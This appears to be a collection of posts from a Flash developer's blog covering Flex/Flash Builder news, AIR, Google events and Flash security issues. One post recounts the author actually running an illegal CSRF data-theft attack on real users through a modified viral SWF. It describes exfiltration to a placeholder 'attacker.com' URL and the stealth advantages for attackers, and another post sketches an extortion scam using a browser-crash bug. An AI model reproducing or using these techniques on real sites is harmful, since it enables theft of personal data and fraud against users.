GUYA.NET

With the release of the new Flash Builder 4 beta yesterday, it’s my chance, again, to congrat Adobe on the name change.

Yeah I know this is old news, Flex builder has been rebranded to Flash Builder. I just wanna join the people who welcomed it.
Flex sounded more serious then Flash so, it served it’s purpose as a marketing term for showing the maturity of the Flash platform. Confused already?!
I know a lot of people were and probably still are. Even seasoned Flash/Flex developers weren’t sure want is going on.
I’ve heard comments like - “Flex is what competing with SilverLight and not Flash.” Which is obviously wrong.

I really wonder why it’s so difficult to understand, it’s not that complicated. If you feel like you still don’t get it then, read this.

Of course some people think this change is a terrible mistake, these are mostly the people who the name Flex was meant to attract and will rather die in pain then to say they’re Flash developers. – You can still be a Flex developer, you know!
Some raise none important questions,  to say the least, like - will the new logo retain it’s colors? – yes it does, yes it does.

I mostly like the change because, it reduces the pain of trying to explain common people what is Flex.
- “There is the Flex Builder and the Flex framework.” Here you probably lost most of them already. And you end with - “but anyway everything is compiled into Flash.” - “Aha, so what is Flex then, again?!”

Here is a screencast about the name change that also showoff the new builder.

Anyway it’s time to get busy with the new toys:

Get Flash Builder 4 Beta

What’s new in Flash Builder 4 beta

What’s new in Flex 4 SDK beta

Get Flash Catalyst

Flash Builder 4, Flex SDK4 and Flash Catalyst tutorial and demonstration videos

gotoAndLearn() Flash Catalyst and Flex 4: Part 1, Part 2

Lately I was wondering how well is AIR doing, has it lived to its promise of compatibility? Today passing through the technical default, Techcrunch, I found out it’s already been installed on 100,000,000 machines in less then a year of existence. Looking at it with most pessimistic assumptions (double installs etc’) still make it a decent number.

Hopefully Adobe will continue to push and improve this cool runtime as vigorously as they did so far.

Two days ago, the first Israeli Google Developer Day was held. It was a colorful and interesting event, to the best of google tradition.

Yesterday, all attendees got an email saying that an unauthorized network activity was detected.

“We identified unauthorised activity on the public wired Ethernet network which was provided by the convention centre for conference attendees to access the Internet.”

Beside the interesting lectures there were two code-labs or hackathons going on. The first thing that came to my mind when I saw everyone are connecting their laptops, wirelly and wirelessly, is that someone will abuse this for some king of Man in the middle attack. But for some reason I thought that since it’s google, they won’t let something like this to happen.

Just minutes before, I asked the google experts over there, which are very nice and professional in there own fields, about the GMail Frame Injection issue. I wasn’t accusing anyone just trying to raise a discussion about it. It seemed that no one knew about it and no one really cared. The suggestion I got was that I should report this somewhere in the GMail website. But, it’s already been reported, I protested.

I should have understood by this, that security isn’t the first priority of these uber geeks.

Maybe we’re expecting too much from google, they’re just the greatest company they’re not gods.

Anyhow I wasn’t hurt by this since I don’t transfer sensitive non encrypted data in these kind of places. And it might be that google is just covering themselves just in case someone got hurt. And most users weren’t really affected.

On a side note, I’ve allowed myself to “analyze” the google dev crowd, I’d expected them to be in higher level then, for example, the Microsoft crowd.

Indeed, in a rough inclusion, the google crowd is much geekier and also much more nerdish, as opposed to the Microsoft crowd, especially here in Israel :D. It can be said that MS is much more approachable and that they create tools that anyone can use, or that MS is aiming to the lowest common denominator, or that everything is political. I don’t care. All I know is that I don’t feel belonging to any of these. The google crowd is too smart nerdish and MS crowd is too… how to say it politely… too stupid common.

I’m somewhere in the creative outskirt, I’m in the Flash crowd

P.C. Not that it’s anything wrong about it to be a common .Net developer, a lot of my best friends are .Net developers

Recently, a questionable Flash feature of writing to the user’s clipboard has been exploited. Adobe will finally fix this feature and it’ll require user interaction (mouse/keyboard click) in the upcoming Flash 10.

IMHO the people in charge of the Flash Player security have chosen the best option, retaining the functionality of the feature and still keeping the users secured.

Of course, a user can be led to click on the malicious Flash movie, or focus to the movie can be set and any keyboard press will lead to a pollution of the clipboard.

A more strict security measure could have been chosen, a dialog box asking the user to permit clipboard writing, could have been implemented. The Flash Player already uses a similar dialog when interacting with the user’s camera and mic. An updated Internet Explorer uses a dialog when interacting with the clipboard, allowing both read and write.

javascript:clipboardData.setData(”text”, “I’m in the clipboard”); (IE only)

But, using the later option will make this feature too annoying for the user, and mostly useless.

Thanx for not killing this feature but still making it secure enough.

Regarding Flash movies that’ll still try to exploit this feature. It’s up to AD distributors and website owners to do their part and not distribute or host malicious files.

Update: Added a sterilized demo and the source code.

CSRF (Cross Site Request Forgery) is considered one of the most widely spread exploits in websites today. I’ve written before about how a legitimate Flash file (swf) can be extremely viral. Few days ago I did a real attack, exploiting a CSRF flaw and elaborated it using the nature of Flash virality. The result shocked me.

I have a confession, I sometime look at the source of websites I browse, generally just to see how they did this and that. I also sometimes encounter security flaws in the script I examine, these flaws range from the very dangerous to the not so important, and my reactions range from informing the owners to just ignore it. I had the honor to find a very lame CSRF flaw in a big website which I’m familiar with it’s owners and some of its users. It was a great opportunity to do a real world test on this exploit. In the exploit I found, the attacker can obtain a lot of personal information from the user. A famous CSRF of similar nature has happened to gmail. Bear in mind that this kind of test is illegal and you should always be sure you won’t get in trouble, or just hide very well

I took the same old viral movie of the pug cleaning the screen (screenclean.swf) and manipulated it (added some simple script) in a way that will attempt to attack any user that’ll view it, if the attack is successful and the user data is stolen it’ll be posted to my database (I’ll review the technical details at a latter point). I’ve then, uploaded the file to a server and sent the link to a few users that I know that uses that website, making it look like a naive chain letter.

Then, I’ve waited for the stolen data to appear in my  database. It was exiting when the first hacked users started to emerge, and with every few refreshes there was a new one. It got a little scary when I saw users that I haven’t directly sent them the email. It was a proof of the virality of the attack.

I was shocked when I saw that some of the users were added to my database being attacked from other servers then mine. This has proved the main point of the test, that attacks inside Flash (swf) files aren’t only viral but also get distributed. I wanted to show that this can happen pointing the screenclean.swf which can be found on ~600 different locations. I’ve never imagined that’ll it’ll happen so fast with my test, and on such an old movie.

After a few hours I’ve pulled the plug on this test and changed the swf file to the harmless original. But it was already too late the swf file got re-distributed (copied to other servers). Since I didn’t set the attack to expire and hasn’t obfuscate the code inside it, It was still attacking users, and worse, someone can look inside the swf and manipulate the attack to his needs. I had no control over that anymore, so we needed to fix this CSRF flaw ASAP.

Using Flash as a vessel to distribute CSRF attacks has some distinct benefits for the attacker:

- Beside the virality nature of these kind of Flash videos and games, swf files gets redistributed (hosted from other servers). This kind of attack will work no matter which server the file is served from, directly or embedded inside an html page.

- Script is hidden inside the Flash (swf), won’t be seen even with “View Generated Source”. Can be obfuscated inside the swf as well. Unless you’re watching the traffic you’ll see nothing suspicious.

- Multiple attacks in one swf. If it’s a game played for an hour, there is plenty of time to try many different attacks. The swf can download new kinds of attacks and/or instructions, when these are available, from the attacker server.

- Attack can be manipulated according to the date and time. For ex, let the swf distribute for a few days before starting to attack, set the attack to expire to make it more stealthy.

- Use shared object (Flash cookie) to maintain the user hacked status, more consistent then a cookie.

- Stealing large amount of data is easier as the data can be taken back to the swf and cross-domain Post can be used instead of Get.

Technical info

First of all, what enable this attack is the flaws and features inside every browser and the Flash Player, as I describe here.

Most CSRF attacks manipulate the user data on his behalf, as described here. The flaw I’ve found is returning live Javascript object with lots of personal data, similar to what happened to gmail. It was done this way, I guess, for ease of development, every page that is authenticated can load the url http://victim.com/personal.php?random and get the user’s data ready for any javascript code on the page, for ex, personalData.email.

The way that browsers are built, when the user is authenticated on one domain with a session or a cookie, every page that’ll load a url from this domain inside a script tag will use the authentication, even if the main page is on different domain. A script tag is one of these rare elements that are exempt from the browsers cross-domain-policy and can be loaded for use on different domains.

When the Flash movie (swf) is viewed inside a browser, the swf is “injecting” a javascript code to the page. This javascript is manipulating the page’s DOM and dynamically creating a script tag, this script is loading the vulnerable url as it source. Most of CSRF attacks will be done at this point, but, since our url is returning data, we need to wait for it and then steal it. We use an interval to check when the data is ready on the page, parse it as a string only with the important data then save it to our server database using the dynamically created script with a get parameter http://attacker.com/stolenData.php?data=sensetive_data. We could have considered putting the data back into the swf and then post it to our server, Flash can do a cross-domain post as opposed to Javascript, might be more efficient when dealing with a large amount of data.

If the attack is successful we save it as a cookie, so we won’t attack the same user more then once. Again, we might consider using a Flash shared object which have more consistency.

Fixing the flaw in the website was just a matter of changing the returned data to a raw JSON instead of a live Javacript object. Fixing all CSRF flaws in a website generally is slightly more cumbersome, but not that much.

Added a sterilized demo and the source code.

Summery

Generally users feel comfortable following links, thinking it’s safe since they’re not installing anything, all the more so when it comes to links for flash and images.

This kind of attack is easy to reproduce, an attacker can simply go to youtube, download the FLV of the coolest short video and repeat the process, or worse, put it inside of an addictive game.

There is a tendency to accuse the platforms for being insecure. I agree that the browsers and the Flash Player will have to disallow scripting between them by default when loading a swf file directly, IE already tries to do it but fails miserably. That won’t solve any scenario though, since the harmful swf can be naively embedded inside an html page with scripting set to be allowed.

It’s always up to the developer to develop secure websites and applications without any CSRF or other type of flaws. No matter how strict is the platform (in this case the browsers and the Flash player), a “good” developer will be able to break the toughest security model in a second by writing vulnerable script.

It up to the developer to be a Safeloper and to produce secure applications

The users should be able to feel safe following a link they get in an email message, it’s part of the nature of the Internet, following links that is.

I also did a similar attack using a JPG but that’s a different story.

Update: You need to check the website to see what I’m talking about

The police (not the band) in general is a problematic institute. Giving average (and below) humans an excessive power and it’s likely that this power will get badly abused. I’ve always considered the Israeli police as somewhat average (average is relatively very good for a police).

Until I saw their pathetic attempt to create what they call the “Virtual Police Station“, created with the worst standards of the 90’s, this is clearly is a bad abuse of the Flash technology.

One should ask himself, until when will I stand aside and let these kind of things happen, when will I stand up and protest?!

Fat cop, thin cop (It stretches)

The police is not secure?!

Although the result is very bad, I must consider there’s might, only might be some users with a very low tech knowledge that might find this version of the website easier to understand. And for that doubt alone, and because I don’t want to be hunted by the police and spend the rest of my life behind bars. I’ll congrat them for the attempt to create something different

This is what fMAME is all about, it’s a MAME (Arcade Games Emulator) written in Flash that is running in every browser with no installation. I get enthusiastic remarks like “Wow I used to play this on the arcade” from most of the people I’ve sent the link to. For now, there’s no sound and only a handful of games are supported, but, it’ll surly improve in the future.

Of course I could have sent them the info of how to download and run the desktop MAME emulator and how to find roms for it. It’ll give them the same experience of traveling back in time. But, how many will bother to do that? Yes it’s simple but the common users want it to be very simple. They don’t want to be bothered with downloads and installation they want to follow a link and start the experience.

The second thing I hear from the people I’ve sent this link to, is, “how did they do that?!” then I need to explain that Flash isn’t just for Ajax like website it’s a complete platform that is only (mainly) stoppable by the creators imagination.

Did I mention it runs in every browser?!

Play fMAME

Update: Adobe Product Security Incident Response Team (PSIRT) has referred to this “Clipboard attack”

Update 2: Aviv Raff has updated me about the fact that it won’t be that easy to replicate this attack using Javascript on the latest browsers and with the default security settings. Thanx.

Lately there were some rumors about a mysteries Flash exploit that is hijacking the users clipboard and will always fill it with a URL to some malicious website, no matter what you’ll copy to the clipboard it’ll will always paste the same URL. This malicious website will ask you to download a fake anti-virus. It’s also been mentioned in some places that in order to clear this behavior you’ll have to restart your machine.

But is it really an exploit, a bug in the Flash player that let the attacker demolish the users clipboard until restart?! From what I’ve seen so far it’s not an exploit and no restart is needed, it’s just a bad use of a Flash and JavaScript feature. Both of these allow a valid script to write text to the user’s clipboard. I’m surprised that only now this questionable feature is starting to get abused. The abusing code is probably residing in some Flash AD, in one of the user tabs and consistently rewriting the clipboard.

Although this attack can be done using simple JavaScript, Flash it the right vessel for this kind of attacks. I think that, encapsulating attacks inside RIA code, mainly Flash and SilverLight, is just starting to gain attention and will become a major security issue. I have some other examples which I attend to write about soon.

Update: via The Universal Desktop, it’s getting closer.

Before you’ll get too enthusiastic, it’s not like the next Flash Player will get a real-time Voice-to-Text engine. Instead, Adobe is working on tools to automatically transcribe the speech from a video and embed it into that video metadata when it’s published as FLV (Flash Video). Probably not something that you can’t already, painfully, do manually with the current FLV and it’s metadata. The key point here is simplicity.

This can be used, for example, to easily create subtitles for our videos. But, the main goal of this technology is to let search engines index video content and even deep link into a video relevant time.

Personally I’d prefer a native real-time engine inside the player that weights only 50kb, but, this is also nice

http://www.beet.tv/2008/07/huge-adobe-read.html

Recently Adobe has been needing to deal with a massive force attacking its main domain of dominance, we can call this domain - the highly interactive web or RIA. I don’t refer to Microsoft SilverLight which is supposed to compete with Adobe Flash on the same ground, but to the brutal MS marketing machine. This machine can make every boy and girl blindly recite fallacious facts and numbly say things like “Yeah, but, SilverLight is search engine optimized”.

It took Adobe some time to understand what it is dealing with, and I think I’ve noticed a change in their PR brutality lately, generating big PR out of small things.

This last SEO announcement from Adobe, which claim that Flash will be more searchable by search engines, might have some substance in it, as opposed to the similar one from Microsoft, but, it’s still mainly a marketing battle. I just hope it doesn’t take too many resources out of the real development of the products.

Google were probably working on their own humanoid crawler that has a broader vision then just the Flash Player and can work with any RIA applications even if its written in AJAX or SilverLight. Apparently searching and indexing RIA is not an easy thing to achieve, and it doesn’t seem that even google has managed to do it yet.

The main problem of indexing Flash websites or any other RIA website, is to understand the context of the data and then link to it directly, aka deep linking. The fact that google can now read the text from within Flash even better then it did before, don’t yet solve that problem.

Even so, it doesn’t mean that we shouldn’t be optimistic, and there is a possibility that this will improved the indexing of Flash content. We’ll have to wait and see.

Update: Apparently SP3 doesn’t downgrade the player. It’ll only install an older version 9.0.115 if you don’t have the latest 9.0.124 already installed, according to this blog post from Ryan Stewart. More info here.

The latest Windows XP service pack 3 comes bundled with the old 8.0.24.0 version of the Flash player. This version, beside not being able to play back some of the latest web content, has some major security flaw, along with a weaker security model and some other bugs.

If you apply this update to your windows system, make sure you install the latest Flash player from here.

Flash, SilverLight, Android, JavaFX, QT and the iPhone. Seems that everyone wants to redefine our mobile phone, the ultimate device/gadget of all time. I’ve written a summary of the latest advancement in the area of rich mobile applications.

Read it here.

Writing a blog is not a simple task, writing a good blog is very difficult. I’m not sure I’m the kind of person who can handle more then one blog, I’m not Lee Brimelow :), but, I’ll give it a try anyway.

My new blog name is, Human VOIP, it’s supposed to be mainly about telephony related stuff, but, somehow Flash seem to sneak in

FLA is one of these file format that we’re used to freely open without any fear. Our complete confidence is going to change since a new exploit has been found. This exploit enable an attacker to manipulate an FLA file in a way that, when loaded into the Flash CS3 or 8 IDE, it will execute arbitrary code on our machine.

No need to panic, it’s unlikely that too many of the malicious FLA files are floating around. Just don’t run any untrusted FLA files until Adobe will issue the fix.

More info

Technical info

The promise of google to have a human like understanding of the Internet it crawls has yet to reach reality. My point is that, we should start to expect Optimized Search Engines (OSE) instead of painfully optimizing our content for them (SEO). Currently search engines can’t understand RIA (Rich Internet Application), websites written in Ajax Flash and SilverLight, and the authors of these websites need to invest a lot of resources to make it SEO. As RIA become bigger and more significant part or the Internet daily, what use is a search engine that can’t understand it? It’s the age of obscurity all over again, the age before google.

This clip (02:22) has reminded me of the old promise that google will see and understand the web the same as we humans do, a promise which wasn’t really fulfilled. I know there is a big technological challenge in that, hey google can’t do it yet, but the one that will do it the best might be the next google.

The search engine game might be open again since the late 90th.

I’ve been thinking lately, will I leave my beloved Flash and jump to the newer SilverLight?! After all that Flash did for me, made me the man I am today, got me this cool job I’m happily manage to wake up (almost) every morning to go to. Will I just leave that all behind? I know SilverLight is still underage but it might become very sexy eventually. What if it’ll become the better technology, can I just dismiss all of our past together, me and Flash, that is? I might also have an easier time pushing SilverLight then Flash, in my area. I’m defiantly gonna play with the real SilverLight (ver 2.0) when it’ll come out, that might be fun.

I believe a lot of us Flashers share the same feeling. Lately this has been recognized even by our native Adobe branch (Israel) which was ignoring us, flashers, completely till now. They have set a Flex3 / Air conference for tomorrow (25.2.2008), which is the exact same day that Microsoft is doing her local Silverlight conference. As for myself, I’m gonna jump between conferences, have the best of both worlds, eat the cakes and have it too, they’ll probably be a lot of cakes

Again, I would like to give Microsoft credit for it’s SilverLight showoffs, even though it’s funded with lots of MS money. The latest is the Microsoft Virtual Events. For me, it didn’t worked in FireFox, gave me some error. Tried in IE7, although it was a lengthy load again (more then 8 mega), the experience was not that good, with lots of too long delays and un-intuitive behaviors and eventually some Javascript errors. maybe it’s mainly a matter of design and not the technology to blame, but this is a Microsoft website, if they don’t know how to use their own technology, then who will.

Compare it with one of the latest Flex showoff, funded with developers passion.

What I would really don’t like to see is that MS will win this fight even though it’ll provide the inferior technology. We’ve all seen it happen in the past, but, I still believe, this time the game is different. If they can really excel Flash then they should be the winners, but, as objective as I can possibly be, I believe they’re still far from it.

I would like to see both of these technologies nurturing each other with the competition. I’m not sure that Flash/Flex would have received such frantic amount of updates in such a short time if it wasn’t for MS upcoming competition. So, so far it’s been great and it’s gonna be even more interesting.

P.S. Maybe this guy can already convince you to make the move to SilverLight

If you haven’t seen this cool pug cleaning your screen then click here. This cool Flash video embed inside a simple swf was floating all over the web for the past month or so.

The first think that came to mind was, lets turn this into a screensaver. Which introduced me to this great 100% freeware, swf to screensaver, Instantstorm. Only then I’ve realized that, it fits too perfectly as a screensaver to not already be a screensaver. indeed, after googleing I’ve found it here and a similar concept here (I wouldn’t install these, might contain ad-wares).

The most interesting thing bout this is, how something that had almost no existent became as viral as hell when it was re-distributed as a simple link to a swf file. No play button, no scrubber, and no nothing, follow the link and you get it filling the whole browser space and the experience starts immediately. Sometimes a link to a swf may be the best way of distribution.

I have written before about my previous working place and how I’ve desperately tried to convince my superiors over there to make the move to Flash/Flex instead of our homebrew Active-x. Back then my CTO rudely dismissed the idea every time it came up.

More then two years after I’ve written this article, he (the CTO) was let go, and the company decided to make the move to Flash. I was no longer working there, but, it became a live or die situation for the company. It might seems that the CTO was the main blockage for this move but he wasn’t the only one. Almost anyone that had an opinion was against Flash. I remember my team leader determining repeatedly “It will never be Flash”. How about some hat eating, if you got any hats left

It might sounds like I’m breaking even with them in this post, and it’s a somewhat true, but I still care for their success and do still keep in touch with most of them and help when I can. It’s just annoys me that people can be so short sighted sometimes.

Anyway, they are currently in an advanced phase of the development, rewriting the homebrew active-x functionalities in Actionscript 3.0. They use the Flex 2 editor although they use little to none of the Flex 2 framework.

Though it saddens me a little, that it was such a painful process for them to turn to the right path and also that I didn’t get to develop this cool Flash product by myself. I believe that I have set the foundation for this move, brightening on the capabilities of AS3 and the Flash VM2 and how it can switch the active-x. So I do feel comforted by the fact that they managed to do it, even if it’s in the 11th hour.

These days I work for jajah, which though it is a larger company, it is still much more younger and dynamic. But still, I encounter some of the same ignorance regarding Flash and non Microsoft technologies. While the use of Flash/Flex isn’t something that is life changing for jajah, yet. We can use it in a lot of places to improve our products. We recently released the Jajah Flash widget and currently working on some Flex stuff.

I still, from time to time hear the same old cliche, “How is your Macromedia/Adobe stocks are doing?”. The fact is that I’ve never had any Adobe stocks, the fact is that I’ve never argued for the use of Flash when it wasn’t simply the best or the only solution. When their will be any alternatives then we’ll see. Since then - Open your eyes, be flexible!

I will present my previous company cool new, Flash driven, product and all of the details, in here, ASAP.

Apparently Adobe has fixed the bug I've found that enables a swf file to crash the browser, with the last version of the Flash Player (9,0,115,0). I don't know if it's related to my post, but, anyway it's good that it's been fixed.

Since it's already fixed, I just want to give an example of how this could have been exploited with a little Social Engineering. This example might look stupid to you and you would have never fall for it but remember, first, it's only an idea, the real attacker might be more creative, second, some Internet users are far from savvy and might fall for crazier stuff then this.

In this example, the naive user will reach a web site with this text: "I've installed a virus on your windows machine and now have full control of it and your FireFox browser. You have exactly 1:00 minute to donate 10$ to my account, click here to donate. If you fail to donate in the appropriate time I will disable your browser for a few minutes. This will be your first and last warning. Afterwards you have exactly 10 minutes to return to this page and complete your donation or your system and personal data will be compromised and damaged permanently. The only way you can remove the virus from your machine is to donate from this page".

The details like OS and browser will be interchangeable with the real user spec. The user will see the 1:00 minute timer counting, when it'll reach 0:00, boom! the browser crashes using the Flash bug, if the user try to close the browser or the tab, Javascript's onbeforeunload can be used to crash the browser and also add some scary alert.

Some of the users will have enough fear in them to return and donate to the attackers PayPal account. Sound crazy?! Some have been known to fall for crazier phishing tricks. I personally know a few. Take care of the dummies near you.

There are some known issues with swfobject and ASP.NET, infact it's not just with swfobject but also with the Flash object in general, one issue of using ExternaInterafce from an ASP.NET Form can be solved with these technics

I had a strange issue with swfobject lately and obviously I've blamed ASP.NET for inserting unwanted code into my pages and causing problems. Generally it's reasonable to blame it as it does make a mess sometimes, but, this time it was my fault for not noticing other Javascript code is conflicting with swfobject.

The issue I had, was with the swfobject's addVariable and addParam functions. The Flash SWF HTML seemed to be written to the page's flashContent div but all of the variables and parameters I've added were ignored. After examining the swfobject getSWFHTML function, this function gives you the HTML code that is gonna embed the Flash inside the page, when I saw how strange the HTML is, I realized what happened:
Without naming names some Javascript developers, extensions and frameworks like to write to the prototype of generic Javascript objects (This is also how Object Oriented Actionscript 1 was done in the past). And with doing so, extending these built-in objects (object, array, string, etc') with various functionalities. A good example is the javascript JSON implementation which extends the Javascript object with object.toJSONString(). Swfobject stores the variables and parameters inside a regular Javascript object and when it prepares the Flash HTML it uses a for..in loop to go through all the elements and add them to the markup
<param value="flashMovie.swf" name="movie" />
<param value="transparent" name="wmode" /> etc'

in case you're using the json.js, your HTML will have also
<param name="toJSONString" value="function (w) {....and whole lotta mess" />.

This might cause the embedding of the Flash movie to fail or function improperly.

The solution for this is to add a check to all of the for..in loops inside swfobject with the hasOwnProperty, for example:

The hasOwnProperty function returns true only if the property is not built-in and not in the prototype chain. Therefor the toJSONString in our example will return false and wont be considered as a flash variable or parameter.

When encountering issues with the swfobject a good place to check is the swfobject.getSWFHTML() function.

More related info about hasOwnProperty.